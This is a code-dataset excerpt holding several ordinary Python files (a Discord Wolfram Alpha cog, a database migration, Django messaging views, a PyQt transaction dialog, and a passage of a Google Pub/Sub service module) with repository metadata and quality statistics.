hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
900d82f05310f821f29ddc9642e0427552a38aae
| 2,687
|
py
|
Python
|
wolfram/wolfram.py
|
Wyn10/aikaterna-cogs
|
a7fd5930f90b4046296ce98406639219c38302a7
|
[
"MIT"
] | null | null | null |
wolfram/wolfram.py
|
Wyn10/aikaterna-cogs
|
a7fd5930f90b4046296ce98406639219c38302a7
|
[
"MIT"
] | null | null | null |
wolfram/wolfram.py
|
Wyn10/aikaterna-cogs
|
a7fd5930f90b4046296ce98406639219c38302a7
|
[
"MIT"
] | 1
|
2019-03-30T05:18:42.000Z
|
2019-03-30T05:18:42.000Z
|
import os
import aiohttp
from discord.ext import commands
import xml.etree.ElementTree as ET
from cogs.utils.dataIO import dataIO
from .utils import checks
from .utils.chat_formatting import escape_mass_mentions
from .utils.chat_formatting import box
from __main__ import send_cmd_help
class Wolfram:
def __init__(self, bot):
self.bot = bot
self.settings = dataIO.load_json("data/wolfram/settings.json")
@commands.command(pass_context=True, name="wolfram", aliases=["ask"])
async def _wolfram(self, ctx, *arguments: str):
"""
Ask Wolfram Alpha any question
"""
api_key = self.settings["WOLFRAM_API_KEY"]
if api_key:
url = "http://api.wolframalpha.com/v2/query?"
query = " ".join(arguments)
payload = {"input": query, "appid": api_key}
headers = {"user-agent": "Red-cog/1.0.0"}
conn = aiohttp.TCPConnector(verify_ssl=False)
session = aiohttp.ClientSession(connector=conn)
async with session.get(url, params=payload, headers=headers) as r:
result = await r.text()
session.close()
root = ET.fromstring(result)
a = []
for pt in root.findall(".//plaintext"):
if pt.text:
a.append(pt.text.capitalize())
if len(a) < 1:
message = "There is as yet insufficient data for a meaningful answer."
else:
message = "\n".join(a[0:3])
else:
message = (
"No API key set for Wolfram Alpha. Get one at http://products.wolframalpha.com/api/"
)
message = escape_mass_mentions(message)
await self.bot.say(box(message))
@commands.command(pass_context=True, name="setwolframapi", aliases=["setwolfram"])
@checks.is_owner()
async def _setwolframapi(self, ctx, key: str):
"""
Set the api-key
"""
if key:
self.settings["WOLFRAM_API_KEY"] = key
dataIO.save_json("data/wolfram/settings.json", self.settings)
await self.bot.say("Key set.")
else:
await send_cmd_help(ctx)
def check_folder():
if not os.path.exists("data/wolfram"):
print("Creating data/wolfram folder...")
os.makedirs("data/wolfram")
def check_file():
data = {}
data["WOLFRAM_API_KEY"] = False
f = "data/wolfram/settings.json"
if not dataIO.is_valid_json(f):
print("Creating default settings.json...")
dataIO.save_json(f, data)
def setup(bot):
check_folder()
check_file()
n = Wolfram(bot)
bot.add_cog(n)
| 32.373494
| 100
| 0.593971
| 331
| 2,687
| 4.691843
| 0.398792
| 0.030908
| 0.036703
| 0.04443
| 0.151964
| 0.079845
| 0
| 0
| 0
| 0
| 0
| 0.003646
| 0.285448
| 2,687
| 82
| 101
| 32.768293
| 0.805208
| 0
| 0
| 0.045455
| 0
| 0.015152
| 0.183886
| 0.030069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0.030303
| 0.136364
| 0
| 0.212121
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
900fd7a3396de18f3541a06d832b5444ad752082
| 671
|
py
|
Python
|
migrations/versions/98f3e3ad195c_update_blog_to_add_a_title.py
|
Josephat-n/myBlog
|
d2e3b368617cd3ca55b6bd40e6950122967e1d9f
|
[
"MIT"
] | null | null | null |
migrations/versions/98f3e3ad195c_update_blog_to_add_a_title.py
|
Josephat-n/myBlog
|
d2e3b368617cd3ca55b6bd40e6950122967e1d9f
|
[
"MIT"
] | null | null | null |
migrations/versions/98f3e3ad195c_update_blog_to_add_a_title.py
|
Josephat-n/myBlog
|
d2e3b368617cd3ca55b6bd40e6950122967e1d9f
|
[
"MIT"
] | null | null | null |
"""update blog to add a title.
Revision ID: 98f3e3ad195c
Revises: 2d98c5165674
Create Date: 2019-12-02 22:58:10.377423
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '98f3e3ad195c'
down_revision = '2d98c5165674'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('title', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('blogs', 'title')
# ### end Alembic commands ###
| 23.137931
| 84
| 0.690015
| 86
| 671
| 5.325581
| 0.616279
| 0.058952
| 0.091703
| 0.100437
| 0.19214
| 0.19214
| 0.19214
| 0.19214
| 0
| 0
| 0
| 0.103074
| 0.175857
| 671
| 28
| 85
| 23.964286
| 0.725136
| 0.460507
| 0
| 0
| 0
| 0
| 0.135385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
901066d43a75d83ccca11050c805f23f07e56a57
| 2,691
|
py
|
Python
|
message/views.py
|
ThusharaX/mumbleapi
|
8435fe9d86869cce81961f42c9860fa3810c171b
|
[
"Apache-2.0"
] | 187
|
2021-04-24T14:49:44.000Z
|
2022-03-31T14:25:22.000Z
|
message/views.py
|
ThusharaX/mumbleapi
|
8435fe9d86869cce81961f42c9860fa3810c171b
|
[
"Apache-2.0"
] | 119
|
2021-04-24T18:08:43.000Z
|
2022-01-09T00:57:19.000Z
|
message/views.py
|
ThusharaX/mumbleapi
|
8435fe9d86869cce81961f42c9860fa3810c171b
|
[
"Apache-2.0"
] | 174
|
2021-04-24T15:57:23.000Z
|
2022-03-11T02:09:04.000Z
|
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from users.models import UserProfile
from .serializers import MessageSerializer , ThreadSerializer
from .models import UserMessage , Thread
from django.db.models import Q
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def read_message(request, pk):
try:
thread = Thread.objects.get(id=pk)
messages = thread.messages.all()
un_read = thread.messages.filter(is_read=False)
for msg in un_read:
msg.is_read = True
msg.save()
serializer = MessageSerializer(messages, many=True)
return Response(serializer.data)
except Exception as e:
return Response({'details': f"{e}"},status=status.HTTP_204_NO_CONTENT)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def CreateThread(request):
sender = request.user.userprofile
recipient_id = request.data.get('recipient_id')
recipient = UserProfile.objects.get(id=recipient_id)
if recipient_id is not None:
try:
thread,created = Thread.objects.get_or_create(sender=sender,reciever=recipient)
serializer = ThreadSerializer(thread, many=False)
return Response(serializer.data)
except UserProfile.DoesNotExist:
return Response({'detail':'User with that id doesnt not exists'})
else:
return Response({'details':'Recipient id not found'})
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def get_messages(request):
user = request.user.userprofile
threads = Thread.objects.filter(Q(sender=user)|Q(reciever=user))
serializer = ThreadSerializer(threads, many=True)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def create_message(request):
sender = request.user.userprofile
data = request.data
thread_id = data.get('thread_id')
if thread_id:
message = data.get('message')
thread= Thread.objects.get(id=thread_id)
if thread:
if message is not None:
message = UserMessage.objects.create(thread=thread,sender=sender,body=message)
message.save()
serializer = ThreadSerializer(thread, many=False)
return Response(serializer.data)
else:
return Response({'details':'Content for message required'})
else:
return Response({'details':'Thread not found'})
else:
return Response({'details':'Please provide other user id'})
| 39
| 94
| 0.687105
| 309
| 2,691
| 5.873786
| 0.271845
| 0.077135
| 0.057851
| 0.077135
| 0.287603
| 0.215978
| 0.176309
| 0.076033
| 0.076033
| 0
| 0
| 0.00141
| 0.209216
| 2,691
| 69
| 95
| 39
| 0.851504
| 0
| 0
| 0.338462
| 0
| 0
| 0.079866
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.123077
| 0
| 0.338462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9010af2b84b0a8a7a8c133b624651330f5e4d485
| 3,691
|
py
|
Python
|
widgets/dialogs/transactions_editor.py
|
redstorm45/money_analyst
|
9ccf8aa4cd7bad7aff21a82ce4219406009f126a
|
[
"Apache-2.0"
] | null | null | null |
widgets/dialogs/transactions_editor.py
|
redstorm45/money_analyst
|
9ccf8aa4cd7bad7aff21a82ce4219406009f126a
|
[
"Apache-2.0"
] | null | null | null |
widgets/dialogs/transactions_editor.py
|
redstorm45/money_analyst
|
9ccf8aa4cd7bad7aff21a82ce4219406009f126a
|
[
"Apache-2.0"
] | null | null | null |
import PyQt5.QtWidgets as Qtw
import PyQt5.QtCore as QtCore
from widgets.labels import LabelsWidget
DATE_FORMAT = 'yyyy-MM-dd'
class TransactionDialog(Qtw.QDialog):
"""
A dialog used to edit a transaction
"""
def __init__(self, parent, model_cat, desc='', category=0, amount=0, date=''):
super(TransactionDialog, self).__init__(parent)
self.validated = False
self.validated_data = None
self.model_cat = model_cat
self.all_labels = model_cat.get_labels()
self.setModal(True)
edit_desc_label = Qtw.QLabel("Description:", self)
self.edit_desc = Qtw.QLineEdit(self)
edit_cat_label = Qtw.QLabel("Catégorie:", self)
self.edit_cat = Qtw.QComboBox(self)
self.edit_cat.insertItems(0, self.model_cat.get_names())
self.edit_cat.setInsertPolicy(self.edit_cat.NoInsert)
edit_amount_label = Qtw.QLabel("Montant (centimes):", self)
self.edit_amount = Qtw.QLineEdit('0', self)
self.edit_amount.textChanged.connect(self.updateAmountHint)
self.edit_amount_hint = Qtw.QLabel('soit: 0,00€', self)
self.edit_date = Qtw.QCalendarWidget(self)
self.edit_labels = LabelsWidget(self, self.all_labels)
buttons_widget = Qtw.QWidget(self)
buttons_layout = Qtw.QHBoxLayout()
cancel_button = Qtw.QPushButton("Annuler", buttons_widget)
cancel_button.clicked.connect(self.reject)
validate_button = Qtw.QPushButton("Valider", buttons_widget)
validate_button.clicked.connect(self.validate)
buttons_layout.addWidget(cancel_button)
buttons_layout.addWidget(validate_button)
buttons_widget.setLayout(buttons_layout)
layout = Qtw.QGridLayout()
layout.addWidget(edit_desc_label, 0, 0)
layout.addWidget(self.edit_desc, 1, 0)
layout.addWidget(edit_cat_label, 2, 0)
layout.addWidget(self.edit_cat, 3, 0)
layout.addWidget(edit_amount_label, 4, 0)
layout.addWidget(self.edit_amount, 5, 0)
layout.addWidget(self.edit_amount_hint, 6, 0)
layout.addWidget(self.edit_date, 0, 1, 7, 1)
layout.addWidget(self.edit_labels, 7, 0, 1, 2)
layout.addWidget(buttons_widget, 8, 0, 1, 2)
self.setLayout(layout)
def updateAmountHint(self):
try:
val = int(self.edit_amount.text())
S = 'soit: ' + str(val//100) + ',' + str(val%100).zfill(2) + '€'
self.edit_amount_hint.setText(S)
except ValueError:
self.edit_amount_hint.setText('soit: ?')
def setData(self, desc, category, amount, date, labels):
self.edit_desc.setText(desc)
self.edit_cat.setCurrentText(self.model_cat.get_name_for_id(category))
self.edit_amount.setText(str(amount))
self.edit_date.setSelectedDate(QtCore.QDate.fromString(date, DATE_FORMAT))
self.edit_labels.set_labels(labels)
def validate(self):
if self.edit_desc.text() == '':
box = Qtw.QMessageBox()
box.setText('Rajoutez une description à la transaction')
box.exec_()
return
try:
amount = int(self.edit_amount.text())
except ValueError:
box = Qtw.QMessageBox()
box.setText('Montant invalide')
box.exec_()
return
self.validated = True
cat_id = self.model_cat.get_id_for_name(self.edit_cat.currentText())
date = self.edit_date.selectedDate().toString(DATE_FORMAT)
labels = self.edit_labels.labels.copy()
self.validated_data = (self.edit_desc.text(), cat_id, amount, date, labels)
self.accept()
| 38.051546
| 83
| 0.648605
| 460
| 3,691
| 5
| 0.265217
| 0.107826
| 0.06087
| 0.06
| 0.12087
| 0.026087
| 0
| 0
| 0
| 0
| 0
| 0.014904
| 0.236521
| 3,691
| 96
| 84
| 38.447917
| 0.800568
| 0.009483
| 0
| 0.12987
| 0
| 0
| 0.040934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051948
| false
| 0
| 0.038961
| 0
| 0.12987
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9010dcd0fdbf2d57ab797fb8bac064a9780ede3f
| 20,416
|
py
|
Python
|
octue/cloud/pub_sub/service.py
|
octue/octue-sdk-python
|
31c6e9358d3401ca708f5b3da702bfe3be3e52ce
|
[
"MIT"
] | 5
|
2020-10-01T12:43:10.000Z
|
2022-03-14T17:26:25.000Z
|
octue/cloud/pub_sub/service.py
|
octue/octue-sdk-python
|
31c6e9358d3401ca708f5b3da702bfe3be3e52ce
|
[
"MIT"
] | 322
|
2020-06-24T15:55:22.000Z
|
2022-03-30T11:49:28.000Z
|
octue/cloud/pub_sub/service.py
|
octue/octue-sdk-python
|
31c6e9358d3401ca708f5b3da702bfe3be3e52ce
|
[
"MIT"
] | null | null | null |
import base64
import concurrent.futures
import json
import logging
import sys
import time
import traceback as tb
import uuid
from google.api_core import retry
from google.cloud import pubsub_v1
import octue.exceptions
import twined.exceptions
from octue.cloud.credentials import GCPCredentialsManager
from octue.cloud.pub_sub import Subscription, Topic
from octue.cloud.pub_sub.logging import GooglePubSubHandler
from octue.mixins import CoolNameable
from octue.resources.manifest import Manifest
from octue.utils.encoders import OctueJSONEncoder
from octue.utils.exceptions import create_exceptions_mapping
from octue.utils.objects import get_nested_attribute
logger = logging.getLogger(__name__)
OCTUE_NAMESPACE = "octue.services"
ANSWERS_NAMESPACE = "answers"
# Switch message batching off by setting max_messages to 1. This minimises latency and is recommended for
# microservices publishing single messages in a request-response sequence.
BATCH_SETTINGS = pubsub_v1.types.BatchSettings(max_bytes=10 * 1000 * 1000, max_latency=0.01, max_messages=1)
EXCEPTIONS_MAPPING = create_exceptions_mapping(
globals()["__builtins__"], vars(twined.exceptions), vars(octue.exceptions)
)
class Service(CoolNameable):
"""A Twined service that can be used in two modes:
* As a server accepting questions (input values and manifests), running them through its app, and responding to the
requesting service with the results of the analysis.
* As a requester of answers from another Service in the above mode.
Services communicate entirely via Google Pub/Sub and can ask and/or respond to questions from any other Service that
has a corresponding topic on Google Pub/Sub.
:param octue.resources.service_backends.ServiceBackend backend: the object representing the type of backend the service uses
:param str|None service_id: a string UUID optionally preceded by the octue services namespace "octue.services."
:param callable|None run_function: the function the service should run when it is called
:return None:
"""
def __init__(self, backend, service_id=None, run_function=None):
if service_id is None:
self.id = f"{OCTUE_NAMESPACE}.{str(uuid.uuid4())}"
elif not service_id:
raise ValueError(f"service_id should be None or a non-falsey value; received {service_id!r} instead.")
else:
if service_id.startswith(OCTUE_NAMESPACE):
self.id = service_id
else:
self.id = f"{OCTUE_NAMESPACE}.{service_id}"
self.backend = backend
self.run_function = run_function
self._credentials = GCPCredentialsManager(backend.credentials_environment_variable).get_credentials()
self.publisher = pubsub_v1.PublisherClient(credentials=self._credentials, batch_settings=BATCH_SETTINGS)
super().__init__()
def __repr__(self):
return f"<{type(self).__name__}({self.name!r})>"
def serve(self, timeout=None, delete_topic_and_subscription_on_exit=False):
"""Start the Service as a server, waiting to accept questions from any other Service using Google Pub/Sub on
the same Google Cloud Platform project. Questions are responded to asynchronously.
:param float|None timeout: time in seconds after which to shut down the service
:param bool delete_topic_and_subscription_on_exit: if `True`, delete the service's topic and subscription on exit
:return None:
"""
topic = Topic(name=self.id, namespace=OCTUE_NAMESPACE, service=self)
topic.create(allow_existing=True)
subscriber = pubsub_v1.SubscriberClient(credentials=self._credentials)
subscription = Subscription(
name=self.id,
topic=topic,
namespace=OCTUE_NAMESPACE,
project_name=self.backend.project_name,
subscriber=subscriber,
expiration_time=None,
)
subscription.create(allow_existing=True)
future = subscriber.subscribe(subscription=subscription.path, callback=self.answer)
logger.debug("%r is waiting for questions.", self)
with subscriber:
try:
future.result(timeout=timeout)
except (TimeoutError, concurrent.futures.TimeoutError, KeyboardInterrupt):
future.cancel()
if delete_topic_and_subscription_on_exit:
topic.delete()
subscription.delete()
def answer(self, question, timeout=30):
"""Answer a question (i.e. run the Service's app to analyse the given data, and return the output values to the
asker). Answers are published to a topic whose name is generated from the UUID sent with the question, and are
in the format specified in the Service's Twine file.
:param dict|Message question:
:param float|None timeout: time in seconds to keep retrying sending of the answer once it has been calculated
:raise Exception: if any exception arises during running analysis and sending its results
:return None:
"""
data, question_uuid, forward_logs = self.parse_question(question)
topic = self.instantiate_answer_topic(question_uuid)
if forward_logs:
analysis_log_handler = GooglePubSubHandler(publisher=self.publisher, topic=topic)
else:
analysis_log_handler = None
try:
analysis = self.run_function(
analysis_id=question_uuid,
input_values=data["input_values"],
input_manifest=data["input_manifest"],
analysis_log_handler=analysis_log_handler,
)
if analysis.output_manifest is None:
serialised_output_manifest = None
else:
serialised_output_manifest = analysis.output_manifest.serialise()
self.publisher.publish(
topic=topic.path,
data=json.dumps(
{
"type": "result",
"output_values": analysis.output_values,
"output_manifest": serialised_output_manifest,
"message_number": topic.messages_published,
},
cls=OctueJSONEncoder,
).encode(),
retry=retry.Retry(deadline=timeout),
)
topic.messages_published += 1
logger.info("%r responded to question %r.", self, question_uuid)
except BaseException as error: # noqa
self.send_exception_to_asker(topic, timeout)
raise error
def parse_question(self, question):
"""Parse a question in the Google Cloud Pub/Sub or Google Cloud Run format.
:param dict|Message question:
:return (dict, str, bool):
"""
try:
# Parse Google Cloud Pub/Sub question format.
data = json.loads(question.data.decode())
question.ack()
logger.info("%r received a question.", self)
except Exception:
# Parse Google Cloud Run question format.
data = json.loads(base64.b64decode(question["data"]).decode("utf-8").strip())
question_uuid = get_nested_attribute(question, "attributes.question_uuid")
forward_logs = bool(int(get_nested_attribute(question, "attributes.forward_logs")))
return data, question_uuid, forward_logs
def instantiate_answer_topic(self, question_uuid, service_id=None):
"""Instantiate the answer topic for the given question UUID for the given service ID.
:param str question_uuid:
:param str|None service_id: the ID of the service to ask the question to
:return octue.cloud.pub_sub.topic.Topic:
"""
return Topic(
name=".".join((service_id or self.id, ANSWERS_NAMESPACE, question_uuid)),
namespace=OCTUE_NAMESPACE,
service=self,
)
def ask(
self,
service_id,
input_values=None,
input_manifest=None,
subscribe_to_logs=True,
allow_local_files=False,
timeout=30,
):
"""Ask a serving Service a question (i.e. send it input values for it to run its app on). The input values must
be in the format specified by the serving Service's Twine file. A single-use topic and subscription are created
before sending the question to the serving Service - the topic is the expected publishing place for the answer
from the serving Service when it comes, and the subscription is set up to subscribe to this.
:param str service_id: the UUID of the service to ask the question to
:param any input_values: the input values of the question
:param octue.resources.manifest.Manifest|None input_manifest: the input manifest of the question
:param bool subscribe_to_logs: if `True`, subscribe to logs from the remote service and handle them with the local log handlers
:param bool allow_local_files: if `True`, allow the input manifest to contain references to local files - this should only be set to `True` if the serving service will have access to these local files
:param float|None timeout: time in seconds to keep retrying sending the question
:return (octue.cloud.pub_sub.subscription.Subscription, str): the response subscription and question UUID
"""
if not allow_local_files:
if (input_manifest is not None) and (not input_manifest.all_datasets_are_in_cloud):
raise octue.exceptions.FileLocationError(
"All datasets of the input manifest and all files of the datasets must be uploaded to the cloud "
"before asking a service to perform an analysis upon them. The manifest must then be updated with "
"the new cloud locations."
)
question_topic = Topic(name=service_id, namespace=OCTUE_NAMESPACE, service=self)
if not question_topic.exists():
raise octue.exceptions.ServiceNotFound(f"Service with ID {service_id!r} cannot be found.")
question_uuid = str(uuid.uuid4())
response_topic = self.instantiate_answer_topic(question_uuid, service_id)
response_topic.create(allow_existing=False)
response_subscription = Subscription(
name=response_topic.name,
topic=response_topic,
namespace=OCTUE_NAMESPACE,
project_name=self.backend.project_name,
subscriber=pubsub_v1.SubscriberClient(credentials=self._credentials),
)
response_subscription.create(allow_existing=False)
if input_manifest is not None:
input_manifest = input_manifest.serialise()
self.publisher.publish(
topic=question_topic.path,
data=json.dumps({"input_values": input_values, "input_manifest": input_manifest}).encode(),
question_uuid=question_uuid,
forward_logs=str(int(subscribe_to_logs)),
retry=retry.Retry(deadline=timeout),
)
logger.info("%r asked a question %r to service %r.", self, question_uuid, service_id)
return response_subscription, question_uuid
def wait_for_answer(self, subscription, service_name="REMOTE", timeout=30):
"""Wait for an answer to a question on the given subscription, deleting the subscription and its topic once
the answer is received.
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription for the question's answer
:param str service_name: an arbitrary name to refer to the service subscribed to by (used for labelling its remote log messages)
:param float|None timeout: how long to wait for an answer before raising a TimeoutError
:raise TimeoutError: if the timeout is exceeded
:return dict: dictionary containing the keys "output_values" and "output_manifest"
"""
subscriber = pubsub_v1.SubscriberClient(credentials=self._credentials)
message_handler = OrderedMessageHandler(
message_puller=self._pull_message,
subscriber=subscriber,
subscription=subscription,
service_name=service_name,
)
with subscriber:
try:
return message_handler.handle_messages(timeout=timeout)
finally:
subscription.delete()
subscription.topic.delete()
def send_exception_to_asker(self, topic, timeout=30):
"""Serialise and send the exception being handled to the asker.
:param octue.cloud.pub_sub.topic.Topic topic:
:param float|None timeout: time in seconds to keep retrying sending of the exception
:return None:
"""
exception_info = sys.exc_info()
exception = exception_info[1]
exception_message = f"Error in {self!r}: {exception}"
traceback = tb.format_list(tb.extract_tb(exception_info[2]))
self.publisher.publish(
topic=topic.path,
data=json.dumps(
{
"type": "exception",
"exception_type": type(exception).__name__,
"exception_message": exception_message,
"traceback": traceback,
"message_number": topic.messages_published,
}
).encode(),
retry=retry.Retry(deadline=timeout),
)
topic.messages_published += 1
def _pull_message(self, subscriber, subscription, timeout):
"""Pull a message from the subscription, raising a `TimeoutError` if the timeout is exceeded before succeeding.
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription the message is expected on
:param float|None timeout: how long to wait in seconds for the message before raising a TimeoutError
:raise TimeoutError|concurrent.futures.TimeoutError: if the timeout is exceeded
:return dict: message containing data
"""
start_time = time.perf_counter()
while True:
no_message = True
attempt = 1
while no_message:
logger.debug("Pulling messages from Google Pub/Sub: attempt %d.", attempt)
pull_response = subscriber.pull(
request={"subscription": subscription.path, "max_messages": 1},
retry=retry.Retry(),
)
try:
answer = pull_response.received_messages[0]
no_message = False
except IndexError:
logger.debug("Google Pub/Sub pull response timed out early.")
attempt += 1
if timeout is not None and (time.perf_counter() - start_time) > timeout:
raise TimeoutError(
f"No message received from topic {subscription.topic.path!r} after {timeout} seconds.",
)
continue
subscriber.acknowledge(request={"subscription": subscription.path, "ack_ids": [answer.ack_id]})
logger.debug("%r received a message related to question %r.", self, subscription.topic.path.split(".")[-1])
return json.loads(answer.message.data.decode())
class OrderedMessageHandler:
"""A handler for Google Pub/Sub messages that ensures messages are handled in the order they were sent.
:param callable message_puller: function that pulls a message from the subscription
:param google.pubsub_v1.services.subscriber.client.SubscriberClient subscriber: a Google Pub/Sub subscriber
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription messages are pulled from
:param str service_name: an arbitrary name to refer to the service subscribed to by (used for labelling its remote log messages)
:param dict|None message_handlers: a mapping of message handler names to callables that handle each type of message
:return None:
"""
def __init__(self, message_puller, subscriber, subscription, service_name="REMOTE", message_handlers=None):
self.message_puller = message_puller
self.subscriber = subscriber
self.subscription = subscription
self.service_name = service_name
self._waiting_messages = {}
self._previous_message_number = -1
self._message_handlers = message_handlers or {
"log_record": self._handle_log_message,
"exception": self._handle_exception,
"result": self._handle_result,
}
def handle_messages(self, timeout=30):
"""Pull messages and handle them in the order they were sent until a result is returned by a message handler,
then return that result.
:param float|None timeout: how long to wait for an answer before raising a `TimeoutError`
:raise TimeoutError: if the timeout is exceeded before receiving the final message
:return dict:
"""
start_time = time.perf_counter()
pull_timeout = None
while True:
if timeout is not None:
run_time = time.perf_counter() - start_time
if run_time > timeout:
raise TimeoutError(
f"No final answer received from topic {self.subscription.topic.path!r} after {timeout} seconds.",
)
pull_timeout = timeout - run_time
